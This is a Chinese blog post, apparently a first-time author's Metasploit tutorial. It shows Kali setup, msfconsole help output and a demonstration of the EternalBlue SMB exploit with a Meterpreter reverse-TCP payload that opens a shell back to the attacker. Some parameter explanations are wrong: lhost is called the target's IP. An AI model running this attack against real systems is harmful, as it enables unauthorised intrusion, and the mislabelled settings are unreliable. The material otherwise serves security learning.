Metasploit教程

idhedanlem15

已于 2023-02-27 12:50:16 修改

阅读量163

点赞数

文章标签： linux 网络运维网络安全

于 2023-02-26 22:51:15 首次发布

本文链接：https://blog.csdn.net/idhedanlem15/article/details/129232450

版权

##写在前言

Knowledge is power, especially when it’s shared. A collaboration between the open source community and Rapid7, Metasploit helps security teams do more than just verify vulnerabilities, manage security assessments, and improve security awareness; it empowers and arms defenders to always stay one step (or two) ahead of the game.

安装metasploit

强烈推荐使用kali Linux系统，我个人发自内心的觉得他超级好用，抛开自带的200多个渗透工具，他也是非常强大的系统。
不说废话了，我们先来下载kali的系统，我这边是直接下载了kali的虚拟机配置，下面：
kali linux 下载
 VMware下载
下载完以后，在kali linux里面就会自带metasploit工具，同时还有nmap、netcat等网络安全工具，可以配合着使用

启动metasploit

首先我们先启动Kali Linux，我们可以看到是这样的
kali Linux启动
默认的账号和密码都是kali，我们输入完以后进入系统，先点这里，在此输入自己的账号密码（kali）
root

提前说明一下，这里是使用了root权限，防止我们某些操作因为权限问题执行不了
kali命令行的复制是ctrl+shift+c，粘贴同理ctrl+shift+v

我们输入msfconsole，进入到msf界面

再接着，我们可以查看help，具体用法也可以在官网查看

msf_help

Core Commands
=============

Command       Description
-------       -----------
?             Help menu
banner        Display an awesome metasploit banner
cd            Change the current working directory
color         Toggle color
connect       Communicate with a host
debug         Display information useful for debugging
exit          Exit the console
features      Display the list of not yet released features that can be opted in to
get           Gets the value of a context-specific variable
getg          Gets the value of a global variable
grep          Grep the output of another command
help          Help menu
history       Show command history
load          Load a framework plugin
quit          Exit the console
repeat        Repeat a list of commands
route         Route traffic through a session
save          Saves the active datastores
sessions      Dump session listings and display information about sessions
set           Sets a context-specific variable to a value
setg          Sets a global variable to a value
sleep         Do nothing for the specified number of seconds
spool         Write console output into a file as well the screen
threads       View and manipulate background threads
tips          Show a list of useful productivity tips
unload        Unload a framework plugin
unset         Unsets one or more context-specific variables
unsetg        Unsets one or more global variables
version       Show the framework and console library version numbers


Command       Description
-------       -----------
advanced      Displays advanced options for one or more modules
back          Move back from the current context
clearm        Clear the module stack
favorite      Add module(s) to the list of favorite modules
info          Displays information about one or more modules
listm         List the module stack
loadpath      Searches for and loads modules from a path
options       Displays global options or for one or more modules
popm          Pops the latest module off the stack and makes it active
previous      Sets the previously loaded module as the current module
pushm         Pushes the active or list of modules onto the module stack
reload_all    Reloads all modules from all defined module paths
search        Searches module names and descriptions
show          Displays modules of a given type, or all modules
use           Interact with a module by name or search term/index



Command       Description
-------       -----------
handler       Start a payload handler as job
jobs          Displays and manages jobs
kill          Kill a job
rename_job    Rename a job




Command       Description
-------       -----------
makerc        Save commands entered since start to a file
resource      Run the commands stored in a file




Command           Description
-------           -----------
analyze           Analyze database information about a specific address or address range
db_connect        Connect to an existing data service
db_disconnect     Disconnect from the current data service
db_export         Export a file containing the contents of the database
db_import         Import a scan result file (filetype will be auto-detected)
db_nmap           Executes nmap and records the output automatically
db_rebuild_cache  Rebuilds the database-stored module cache (deprecated)
db_remove         Remove the saved data service entry
db_save           Save the current data service connection as the default to reconnect on startup
db_status         Show the current data service status
hosts             List all hosts in the database
loot              List all loot in the database
notes             List all notes in the database
services          List all services in the database
vulns             List all vulnerabilities in the database
workspace         Switch between database workspaces




Command       Description
-------       -----------
creds         List all credentials in the database




Command       Description
-------       -----------
edit          Edit the current module or a file with the preferred editor
irb           Open an interactive Ruby shell in the current context
log           Display framework.log paged to the end if possible
pry           Open the Pry debugger on the current module or Framework
reload_lib    Reload Ruby library files from specified paths
time          Time how long it takes to run a particular command

msfconsole is the primary interface to Metasploit Framework. There is quite a
lot that needs go here, please be patient and keep an eye on this space!

Many commands and options that take a list of things can use ranges to avoid
having to manually list each desired thing. All ranges are inclusive.

Commands that take a list of IDs can use ranges to help. Individual IDs must be
separated by a , (no space allowed) and ranges can be expressed with either
- or ...

There are several ways to specify ranges of IP addresses that can be mixed
together. The first way is a list of IPs separated by just a (ASCII space),
with an optional ,. The next way is two complete IP addresses in the form of
BEGINNING_ADDRESS-END_ADDRESS like 127.0.1.44-127.0.2.33. CIDR
specifications may also be used, however the whole address must be given to
Metasploit like 127.0.0.0/8 and not 127/8, contrary to the RFC.
Additionally, a netmask can be used in conjunction with a domain name to
dynamically resolve which block to target. All these methods work for both IPv4
and IPv6 addresses. IPv4 addresses can also be specified with special octet
ranges from the NMAP target
specification

Terminate the first sessions:

sessions -k 1

Stop some extra running jobs:

jobs -k 2-6,7,8,11..15

Check a set of IP addresses:

check 127.168.0.0/16, 127.0.0-2.1-4,15 127.0.0.255

Target a set of IPv6 hosts:

set RHOSTS fe80::3990:0000/110, ::1-::f0f0

Target a block from a resolved domain name:

set RHOSTS www.example.test/24

设置载荷

常用载荷
载荷的使用方法：
set payload 载荷（就是路径）

Payload：Payload中包含攻击进入目标主机后需要在远程系统中运行的恶意代码，而在Metasploit中Payload是一种特殊模块，它们能够以漏洞利用模块运行，并能够利用目标系统中的安全漏洞实施攻击。简而言之，这种漏洞利用模块可以访问目标系统，而其中的代码定义了Payload在目标系统中的行为。
Shellcode：Shellcode是payload中的精髓部分，在渗透攻击时作为攻击载荷运行的一组机器指令。Shellcode通常用汇编语言编写。在大多数情况下，目标系统执行了shellcode这一组指令之后，才会提供一个命令行shell。

设置常用的一些必须项

设置靶机ip set lhost 靶机ip
设置靶机端口set lport 你想要攻击的端口 （附常用端口大全）
查看需要配置的项：options
设置模块：use 路径
这里我以永恒之蓝的举例：

永恒之蓝攻击演示

msf6 exploit(windows/smb/ms17_010_eternalblue) > options

    Module options (exploit/windows/smb/ms17_010_eternalblue):

       Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedde
                                             d Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded St
                                             andard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 t
                                             arget machines.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.***.***   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168…
lhost => 192.168…
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 1145
lport => 1145
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

最后输入exploit开启攻击

PS：第一次写文章还请大佬见谅